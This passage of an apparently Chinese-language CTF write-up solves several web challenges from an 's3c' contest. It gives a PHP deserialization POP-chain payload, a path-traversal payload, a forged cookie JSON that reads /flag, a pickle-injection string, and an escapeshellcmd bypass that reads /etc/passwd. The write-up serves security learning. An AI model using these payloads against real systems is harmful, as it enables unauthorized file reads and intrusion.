  public $too;</span><br><span class="line">    public function __toString()</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;too-&gt;three;</span><br><span class="line">        return &#x27;w3lc0me_to_S3c&#x27;;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class q&#123;</span><br><span class="line">    public $amo;</span><br><span class="line">    public $read;</span><br><span class="line">    public function __destruct()</span><br><span class="line">    &#123;</span><br><span class="line">        if($this-&gt;read===&#x27;next&#x27;)&#123;</span><br><span class="line">            echo $this-&gt;amo;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">class d&#123;</span><br><span class="line">    public $io;</span><br><span class="line">    public function __get($name)</span><br><span class="line">    &#123;</span><br><span class="line">        ($this-&gt;io)();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class b&#123;</span><br><span class="line">    public $iu;</span><br><span class="line">    public function __call($name, $arguments)</span><br><span class="line">    &#123;</span><br><span class="line">        echo &quot;you_are_sUccessssd&quot;;</span><br><span class="line">        echo file_get_contents(&quot;/flag&quot;);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class r&#123;</span><br><span class="line">    public $hh;</span><br><span class="line">    public function __invoke()</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;hh-&gt;zxxxxxxxrrrrr();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$a = $_GET[&#x27;payload&#x27;];</span><br><span class="line">unserialize($a); </span><br></pre></td></tr></table></figure>

<h6 id="步骤2：构造链子-从后往前找"><a href="#步骤2：构造链子-从后往前找" class="headerlink" title="步骤2：构造链子   从后往前找"></a>步骤2：构造链子   从后往前找</h6><p>第一步：</p>
<p>第二步：</p>
<p>第三步：</p>
<p>第四步：</p>
<p>第五步：</p>
<p>payload如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">    class p&#123;</span><br><span class="line">        public $too;</span><br><span class="line">     &#125;</span><br><span class="line">    class q&#123;</span><br><span class="line">        public $amo;</span><br><span class="line">        public $read=&#x27;next&#x27;;</span><br><span class="line">    &#125;</span><br><span class="line">    class d&#123;</span><br><span class="line">        public $io;</span><br><span class="line">    </span><br><span class="line">    &#125;</span><br><span class="line">    class b&#123;</span><br><span class="line">        public $iu;</span><br><span class="line">    &#125;</span><br><span class="line">    class r&#123;</span><br><span class="line">        public $hh;&#125;</span><br><span class="line">    $payload=new q();</span><br><span class="line">    $payload-&gt;amo = new p();</span><br><span class="line">    $payload-&gt;amo-&gt;too=new d();</span><br><span class="line">    $payload-&gt;amo-&gt;too-&gt;io=new r();</span><br><span class="line">    $payload-&gt;amo-&gt;too-&gt;io-&gt;hh=new b();</span><br><span class="line">    echo serialize($payload);</span><br><span class="line">?&gt;</span><br><span class="line">//O:1:&quot;q&quot;:2:&#123;s:3:&quot;amo&quot;;O:1:&quot;p&quot;:1:&#123;s:3:&quot;too&quot;;O:1:&quot;d&quot;:1:&#123;s:2:&quot;io&quot;;O:1:&quot;r&quot;:1:&#123;s:2:&quot;hh&quot;;O:1:&quot;b&quot;:1:&#123;s:2:&quot;iu&quot;;N;&#125;&#125;&#125;&#125;s:4:&quot;read&quot;;s:4:&quot;next&quot;;&#125;</span><br></pre></td></tr></table></figure>

<h3 id="So-Easy"><a href="#So-Easy" class="headerlink" title="So_Easy"></a>So_Easy</h3><p>考点：绕过$_SESSION变量，由于没给赋初值，它是一个固定的数，但我们不知道，查了百度，如下</p>
<h6 id="步骤1：输出-SESSION的值"><a href="#步骤1：输出-SESSION的值" class="headerlink" title="步骤1：输出$_SESSION的值"></a>步骤1：输出$_SESSION的值</h6><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">var_dump( @md5($_SESSION[&#x27;flag&#x27;]));        得到初始值</span><br></pre></td></tr></table></figure>

<p><img src="/images/loading.gif" data-original="/2022/10/23/s3c%E6%8B%9B%E6%96%B0%E8%B5%9BWP/wp20.png"></p>
<h6 id="步骤2：绕过下面的反序列化"><a href="#步骤2：绕过下面的反序列化" class="headerlink" title="步骤2：绕过下面的反序列化"></a>步骤2：绕过下面的反序列化</h6><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line">$test=&#x27;&#x27;;</span><br><span class="line">$test=array(&quot;user&quot;=&gt;admin,&quot;password&quot;=&gt;hahahahahahaha);</span><br><span class="line">echo var_dump($test);</span><br><span class="line">echo var_dump(serialize($test));</span><br><span class="line"> </span><br><span class="line">$test1=&#x27;&#x27;;</span><br><span class="line">$test1=array(&quot;user&quot;=&gt;admin,&quot;password&quot;=&gt;hahahahahahaha);</span><br><span class="line">echo var_dump($test1);</span><br><span class="line">echo var_dump(serialize($test1));</span><br><span class="line">//#s3c&#123;Y0u_mUst_bE_An_exceLLent_CTFer&#125;    在线数组对应生成反序列化模板！学习</span><br><span class="line">?&gt;      //原理，可以自己百度下PHP语法，试下构造数组对应</span><br></pre></td></tr></table></figure>

<h3 id="readMMMEEE"><a href="#readMMMEEE" class="headerlink" title="readMMMEEE"></a>readMMMEEE</h3><p>考点：路径读取问题。       实在懒得复现了，这题真不难。。。！</p>
<p>访问给的路径，但我们知道图片后面不能再切换目录了，所以只能在参数下手！</p>
<p>构造payload：&#x2F;cancanneed?img&#x3D;..&#x2F;..&#x2F;..&#x2F;flag  网页源码无法查看，直接BP抓包输入得到flag回显</p>
<h3 id="DJ-Diary"><a href="#DJ-Diary" class="headerlink" title="DJ_Diary"></a>DJ_Diary</h3><p>考点：cookie伪造，代码审计</p>
<p>思路：修改cookie的name的值，变为可利用的参数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">function img2b64($image) &#123;</span><br><span class="line">    return &#x27;data:jpg;base64,&#x27;.base64_encode(file_get_contents($image));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function get_img_contents() &#123;</span><br><span class="line">    $results = [];</span><br><span class="line"></span><br><span class="line">    if (empty($_COOKIE[&#x27;cache&#x27;])) &#123;</span><br><span class="line"></span><br><span class="line">        $images = glob(&#x27;images/*.jpg&#x27;);    </span><br><span class="line">        $expiry = time() + 60*60*24*7;</span><br><span class="line"></span><br><span class="line">        foreach($images as $image) &#123;      //这里的$image为上面glob函数的每张图片的值，无法控制</span><br><span class="line">            $text = preg_replace(&#x27;/\\.[^.\\s]&#123;3,4&#125;$/&#x27;, &#x27;.txt&#x27;, $image);</span><br><span class="line">            $description = trim(file_get_contents($text));</span><br><span class="line">            array_push($results, array(</span><br><span class="line">                &#x27;name&#x27; =&gt; $image,</span><br><span class="line">                &#x27;description&#x27; =&gt; $description</span><br><span class="line">            ));</span><br><span class="line">            $_SESSION[$image] = img2b64($image);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        $cookie = array(&#x27;data&#x27; =&gt; $results, &#x27;expiry&#x27; =&gt; $expiry);</span><br><span class="line">        setcookie(&#x27;cache&#x27;, json_encode($cookie), $expiry);</span><br><span class="line"></span><br><span class="line">    &#125; else &#123;</span><br><span class="line"></span><br><span class="line">        $cache = json_decode($_COOKIE[&#x27;cache&#x27;], true);</span><br><span class="line">        if ($cache[&#x27;expiry&#x27;] &lt;= time()) &#123;</span><br><span class="line"></span><br><span class="line">            $expiry = time() + 60*60*24*7;</span><br><span class="line">            for($i = 0; $i &lt; count($cache[&#x27;data&#x27;]); $i++) &#123;</span><br><span class="line">                $result = $cache[&#x27;data&#x27;][$i];</span><br><span class="line">                $_SESSION[$result[&#x27;name&#x27;]] = img2b64($result[&#x27;name&#x27;]);</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            $cookie = array(&#x27;data&#x27; =&gt; $cache[&#x27;data&#x27;], &#x27;expiry&#x27; =&gt; $expiry);</span><br><span class="line">            setcookie(&#x27;cache&#x27;, json_encode($cookie), $expiry);</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        return $cache[&#x27;data&#x27;];</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    return $results;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h6 id="步骤1：代码审计-1"><a href="#步骤1：代码审计-1" class="headerlink" title="步骤1：代码审计"></a>步骤1：代码审计</h6><p>第一个for循环的$image并不可控，所以我们采用第二个循环 expiry的值小于time，并且cookie为一个数组data一个，expiry一个</p>
<h6 id="步骤2：构造payload："><a href="#步骤2：构造payload：" class="headerlink" title="步骤2：构造payload："></a>步骤2：构造payload：</h6><p>{“data”:[{“name”:”xxx”,”description”:”\u829d\u58eb\u96ea\u8c79”}]，xxxx的值可控并利用，所以我们只需要根据提示构造即可！</p>
<p>{“data”:[{“name”:”&#x2F;flag”,”description”:”\u829d\u58eb\u96ea\u8c79”}],”expiry”:1667432089}url编码即可</p>
<h3 id="白给皮卡丘"><a href="#白给皮卡丘" class="headerlink" title="白给皮卡丘"></a>白给皮卡丘</h3><p>考点：pickle反序列化</p>
<p>源码如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/env python</span><br><span class="line"># -*- coding:utf-8 -*-</span><br><span class="line"># author:l0sE2</span><br><span class="line"># datetime:2022/10/23 11:54</span><br><span class="line"># software: PyCharm</span><br><span class="line">import base64</span><br><span class="line">import pickle</span><br><span class="line">import pickletools</span><br><span class="line">from flask import Flask, session,request</span><br><span class="line">import secretflag</span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.config[&#x27;SECRET_KEY&#x27;] = &#x27;S3C&#x27;</span><br><span class="line">class Hello():</span><br><span class="line">    def __init__(self):</span><br><span class="line">        self.DOUWANTFLAG = &#x27;no&#x27;</span><br><span class="line">        self.user =&#x27;MY FRIEND&#x27;</span><br><span class="line">    def say__HI(self,whoareU):</span><br><span class="line">        self.user = whoareU         </span><br><span class="line"></span><br><span class="line">class FALG():#你这flag不保熟啊</span><br><span class="line">    def __init__(self):</span><br><span class="line">        self.flag = &#x27;fl0g&#123;ni_yao_bu_yao_ba&#125;&#x27;</span><br><span class="line">    def pikapika(self,pika):</span><br><span class="line">        hell = pickle.loads(pika.replace(b&#x27;\u005cn&#x27;, b&#x27;\n&#x27;))</span><br><span class="line">        if hell.DOUWANTFLAG == &#x27;yes&#x27; :</span><br><span class="line">            return secretflag.realflag  //判断读取flag的条件，覆盖原来的DOUWANTFLAG值</span><br><span class="line">        else:</span><br><span class="line">            return self.flag</span><br><span class="line"></span><br><span class="line">@app.route(&#x27;/&#x27;)</span><br><span class="line">def hello_world():</span><br><span class="line">    hello = Hello()   //实例化类</span><br><span class="line">    if not request.args.get(&#x27;user&#x27;):</span><br><span class="line">        return &#x27;Hello &#123;&#125;! 只有真正渴望获得flag的ctfer才能成功&#x27;.format(hello.user)</span><br><span class="line">    else:</span><br><span class="line">        flag = FALG()</span><br><span class="line">        G3T = request.args.get(&#x27;user&#x27;)  //传user的值</span><br><span class="line">        print(G3T)</span><br><span class="line">        if &#x27;R&#x27; in G3T or &#x27;i&#x27; in G3T or &#x27;o&#x27; in G3T or &#x27;b&#x27; in G3T:</span><br><span class="line">            return &#x27;R i o b is forbidden! but your payload:&#123;&#125;! &#x27;.format(G3T) //禁用了一些非预期解 R代码的利用</span><br><span class="line">        hello.say__HI(G3T)  //输出user的值  例如?user=1  回显hello，1</span><br><span class="line">        pickle_hello = pickle.dumps(hello, protocol=0)</span><br><span class="line">        pickle_hello = pickletools.optimize(pickle_hello)</span><br><span class="line">        F = flag.pikapika(pickle_hello)</span><br><span class="line">        return &#x27;Hello &#123;&#125;!here is your flag&lt;br/&gt;&#123;&#125;!&#x27;.format(G3T,F)</span><br><span class="line"></span><br><span class="line">if __name__ == &#x27;__main__&#x27;:</span><br><span class="line">    app.run(host=&#x27;0.0.0.0&#x27;, port=5000)</span><br></pre></td></tr></table></figure>

<h6 id="步骤1：代码审计-2"><a href="#步骤1：代码审计-2" class="headerlink" title="步骤1：代码审计"></a>步骤1：代码审计</h6><p>我们试着传入user&#x3D;1</p>
<p><img src="/images/loading.gif" data-original="/2022/10/23/s3c%E6%8B%9B%E6%96%B0%E8%B5%9BWP/wp21.png"></p>
<p>有回显，输出了FLAG类里的self.flag变量值，显然，这并不是我们要的flag！</p>
<p>很明显，我们只要满足以下条件：即可调用secretflag模块的函数读取flag！</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">if hell.DOUWANTFLAG == &#x27;yes&#x27; :</span><br><span class="line">            return secretflag.realflag  //判断读取flag的条件，覆盖原来的DOUWANTFLAG值</span><br></pre></td></tr></table></figure>

<p>但问题又来了，我们怎么改变原有的变量值呢？</p>
<p>这里就不得不说pickle序列化神奇的地方：只需要在传入参数的位置修改以下即可</p>
<p>例子：?user&#x3D;1\nsVDOUWANTFLAG\nVyes</p>
<h3 id="Time-Controller"><a href="#Time-Controller" class="headerlink" title="Time_Controller"></a>Time_Controller</h3><p>考点：data命令，escapeshellcmd()函数转义</p>
<p>data -f 读取文件的命令</p>
<p>escapeshellcmd()函数会对一些命令进行转移，这里可以百度一下，这题直接format传参即可试试哪些字符转移，转移后的样子</p>
<p>查看时间，发现可以直接执行data %H:%M:%S </p>
<p>在通过提示：试试-f读取  data -f &#x2F;etc&#x2F;passwd发现不行</p>
<p>加个引号试试 data ‘-f &#x2F;etc&#x2F;passwd’发现可以！flag在根目录，data ‘-f &#x2F;flag’即可拿到flag！</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Wuhen</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://wuhenblog.top/2022/10/23/s3c%E6%8B%9B%E6%96%B0%E8%B5%9BWP/">https://wuhenblog.top/2022/10/23/s3c%E6%8B%9B%E6%96%B0%E8%B5%9BWP/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Wuhen</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/%E6%AF%94%E8%B5%9BWP/">
                                    <span class="chip bg-color">比赛WP</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/images/loading.gif" data-original="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/images/loading.gif" data-original="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    
        <style>
    .valine-card {
        margin: 1.5rem auto;
    }

    .valine-card .card-content {
        padding: 20px 20px 5px 20px;
    }

    #vcomments textarea {
        box-sizing: border-box;
        background: url("/medias/comment_bg.png") 100% 100% no-repeat;
    }

    #vcomments p {
        margin: 2px 2px 10px;
        font-size: 1.05rem;
        line-height: 1.78rem;
    }

    #vcomments blockquote p {
        text-indent: 0.2rem;
    }

    #vcomments a {
        padding: 0 2px;
        color: #4cbf30;
        font-weight: 500;
        text-decoration: none;
    }

    #vcomments img {
        max-width: 100%;
        height: auto;
        cursor: pointer;
    }

    #vcomments ol li {
        list-style-type: decimal;
    }

    #vcomments ol,
    ul {
        display: block;
        padding-left: 2em;
        word-spacing: 0.05rem;
    }

    #vcomments ul li,
    ol li {
        display: list-item;
        line-height: 1.8rem;
        font-size: 1rem;
    }

    #vcomments ul li {
        list-style-type: disc;
    }

    #vcomments ul ul li {
        list-style-type: circle;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    #vcomments table, th, td {
        border: 0;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments h1 {
        font-size: 1.85rem;
        font-weight: bold;
        line-height: 2.2rem;
    }

    #vcomments h2 {
        font-size: 1.65rem;
        font-weight: bold;
        line-height: 1.9rem;
    }

    #vcomments h3 {
        font-size: 1.45rem;
        font-weight: bold;
        line-height: 1.7rem;
    }

    #vcomments h4 {
        font-size: 1.25rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    #vcomments h5 {
        font-size: 1.1rem;
        font-weight: bold;
        line-height: 1.4rem;
    }

    #vcomments h6 {
        font-size: 1rem;
        line-height: 1.3rem;
    }

    #vcomments p {
        font-size: 1rem;
        line-height: 1.5rem;
    }

    #vcomments hr {
        margin: 12px 0;
        border: 0;
        border-top: 1px solid #ccc;
    }

    #vcomments blockquote {
        margin: 15px 0;
        border-left: 5px solid #42b983;
        padding: 1rem 0.8rem 0.3rem 0.8rem;
        color: #666;
        background-color: rgba(66, 185, 131, .1);
    }

    #vcomments pre {
        font-family: monospace, monospace;
        padding: 1.2em;
        margin: .5em 0;
        background: #272822;
        overflow: auto;
        border-radius: 0.3em;
        tab-size: 4;
    }

    #vcomments code {
        font-family: monospace, monospace;
        padding: 1px 3px;
        font-size: 0.92rem;
        color: #e96900;
        background-color: #f8f8f8;
        border-radius: 2px;
    }

    #vcomments pre code {
        font-family: monospace, monospace;
        padding: 0;
        color: #e8eaf6;
        background-color: #272822;
    }

    #vcomments pre[class*="language-"] {
        padding: 1.2em;
        margin: .5em 0;
    }

    #vcomments code[class*="language-"],
    pre[class*="language-"] {
        color: #e8eaf6;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }

    #vcomments b,
    strong {
        font-weight: bold;
    }

    #vcomments dfn {
        font-style: italic;
    }

    #vcomments small {
        font-size: 85%;
    }

    #vcomments cite {
        font-style: normal;
    }

    #vcomments mark {
        background-color: #fcf8e3;
        padding: .2em;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }
</style>

<div class="card valine-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; padding-left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="vcomments" class="card-content" style="display: grid">
    </div>
</div>

<script src="/libs/valine/av-min.js"></script>
<script src="/libs/valine/Valine.min.js"></script>
<script>
    new Valine({
        el: '#vcomments',
        appId: 'RBqNYIcScjnd5jLCd5cFIS7X-gzGzoHsz',
        appKey: 'dXwhjMKFOtSPymCj0wWidCxb',
        notify: 'false' === 'true',
        verify: 'false' === 'true',
        visitor: 'true' === 'true',
        avatar: 'mm',
        pageSize: '10',
        lang: 'zh-cn',
        placeholder: 'just go go'
    });
</script>

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2022/10/25/%E8%AE%AD%E7%BB%83%E6%89%93%E5%8D%A1/">
                    <div class="card-image">
                        
                        
                        <img src="/images/loading.gif" data-original="/medias/featureimages/4.jpg" class="responsive-img" alt="训练打卡">
                        
                        <span class="card-title">训练打卡</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2022-10-25
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/CTF/" class="post-category">
                                    CTF
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/web/">
                        <span class="chip bg-color">web</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2022/10/21/java%E8%AF%AD%E6%B3%95%E9%80%9F%E9%80%9A/">
                    <div class="card-image">
                        
                        
                        <img src="/images/loading.gif" data-original="/medias/featureimages/13.jpg" class="responsive-img" alt="java语法速通">
                        
                        <span class="card-title">java语法速通</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-10-21
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E7%BC%96%E7%A8%8B%E8%AF%AD%E6%B3%95/" class="post-category">
                                    编程语法
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/java/">
                        <span class="chip bg-color">java</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>


<script>
    $('#articleContent').on('copy', function (e) {
        // IE8 or earlier browser is 'undefined'
        if (typeof window.getSelection === 'undefined') return;

        var selection = window.getSelection();
        // if the selection is short let's not annoy our users.
        if (('' + selection).length < Number.parseInt('120')) {
            return;
        }

        // create a div outside of the visible area and fill it with the selected text.
        var bodyElement = document.getElementsByTagName('body')[0];
        var newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        bodyElement.appendChild(newdiv);
        newdiv.appendChild(selection.getRangeAt(0).cloneContents());

        // we need a <pre> tag workaround.
        // otherwise the text inside "pre" loses all the line breaks!
        if (selection.getRangeAt(0).commonAncestorContainer.nodeName === 'PRE') {
            newdiv.innerHTML = "<pre>" + newdiv.innerHTML + "</pre>";
        }

        var url = document.location.href;
        newdiv.innerHTML += '<br />'
            + '来源: web手走的路还要很长<br />'
            + '文章作者: Wuhen<br />'
            + '文章链接: <a href="' + url + '">' + url + '</a><br />'
            + '本文章著作权归作者所有，任何形式的转载都请注明出处。';

